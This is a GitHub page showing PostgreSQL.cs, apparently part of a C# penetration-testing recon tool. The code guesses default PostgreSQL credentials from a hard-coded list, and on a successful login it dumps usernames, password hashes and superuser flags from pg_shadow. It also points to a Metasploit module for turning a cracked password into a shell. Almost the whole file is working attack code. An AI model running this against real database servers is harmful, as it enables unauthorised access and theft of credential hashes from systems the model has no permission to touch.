-
Notifications
You must be signed in to change notification settings - Fork 4
/
PostgreSQL.cs
110 lines (109 loc) · 5.03 KB
/
PostgreSQL.cs
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
using Npgsql; // For PostgreSQL Stuff
using System;
using System.Collections.Generic;
using System.Data;
namespace Reecon
{
class PostgreSQL
{
public static (string, string) GetInfo(string target, int port)
{
string toReturn = "";
// Thanks Metasploit!
List<string> userList = new() { "postgres", "scott", "admin" };
List<string> passList = new() { "tiger", "postgres", "password", "admin" };
bool toBreak = false;
foreach (string username in userList)
{
if (toBreak)
{
break;
}
foreach (string password in passList)
{
if (toBreak)
{
break;
}
using NpgsqlConnection conn = new($"Host={target};Port={port};User Id={username};Password={password};Database=template1;");
try
{
// Try connect
conn.Open();
// We're connect - Creds are correct!
toReturn += "- Login creds found: " + username + ":" + password + Environment.NewLine;
toBreak = true;
// Pull version info
try
{
NpgsqlCommand cmd = new("SELECT version()", conn);
DataSet ds = new();
NpgsqlDataAdapter da = new()
{
SelectCommand = cmd
};
da.Fill(ds);
foreach (DataRow r in ds.Tables[0].Rows)
{
toReturn += "- Version: " + r["version"].ToString() + Environment.NewLine;
}
}
catch (Exception ex)
{
toReturn += "- Unable to pull Version info - Bug Reelix: " + ex.Message + Environment.NewLine;
}
try
{
NpgsqlCommand cmd = new("SELECT usename, passwd, usesuper FROM pg_shadow", conn);
DataSet ds = new();
NpgsqlDataAdapter da = new()
{
SelectCommand = cmd
};
da.Fill(ds);
foreach (DataRow r in ds.Tables[0].Rows)
{
string dbUser = r["usename"].ToString();
string dbPass = r["passwd"].ToString();
bool superUser = bool.Parse(r["usesuper"].ToString());
toReturn += "- pg_shadow User: " + dbUser + " - " + dbPass + " - Super User: " + superUser + Environment.NewLine;
}
toReturn += "-- If a pg_shadow user password is cracked, you can get a shell with: use exploit/multi/postgres/postgres_copy_from_program_cmd_exec";
}
catch (Exception ex)
{
toReturn += "- Unable to pull pg_shadow info - Bug Reelix: " + ex.Message + Environment.NewLine;
}
}
catch (Exception ex)
{
if (ex.Message.Trim().StartsWith("28P01"))
{
// Invalid Password
}
else if (ex.Message == "Dependency unixODBC with minimum version 2.3.1 is required")
{
toReturn += "- Dependency missing. Download from: https://docs.microsoft.com/en-us/sql/connect/odbc/linux-mac/installing-the-microsoft-odbc-driver-for-sql-server?view=sql-server-ver15#ubuntu17";
toBreak = true;
}
else
{
toReturn += "- Fatal Error in PostgreSQL.GetInfo - Bug Reelix: " + ex.Message;
if (ex.InnerException != null)
{
Console.WriteLine("Inner exception is not null: " + ex.InnerException.Message);
}
toBreak = true;
}
}
}
}
if (toReturn == "")
{
toReturn = "- Unable to find credentials";
}
toReturn = toReturn.Trim(Environment.NewLine.ToCharArray());
return ("PostgreSQL", toReturn);
}
}
}